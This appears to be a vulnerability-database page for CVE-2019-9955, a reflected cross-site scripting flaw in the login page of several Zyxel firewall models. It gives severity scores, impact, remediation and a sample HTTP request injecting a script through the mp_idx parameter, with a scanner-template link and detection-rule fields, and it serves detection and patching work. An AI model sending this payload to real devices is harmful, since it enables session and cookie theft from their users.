🔙 목록으로 돌아가기

CVE-2019-9955: Zyxel - Cross-Site Scripting

TitleZyxel - Cross-Site Scripting
Authorpdteam
SeverityMedium
ImpactAttackers can execute scripts in the victim's browser, potentially stealing cookies, session tokens, or performing actions on behalf of the user.
RemediationApply the latest firmware updates provided by Zyxel to fix the reflected cross-site scripting vulnerability.
CVSS Score6.1
EPSS Score0.11615
CVE IDCVE-2019-9955
CWE IDCWE-79
Tags cve cve2019 zyxel packetstorm seclists edb xss vuln

🔍 Vulnerability Description

Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.

🌐 HTTP Request

GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/14.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9955.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9955.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A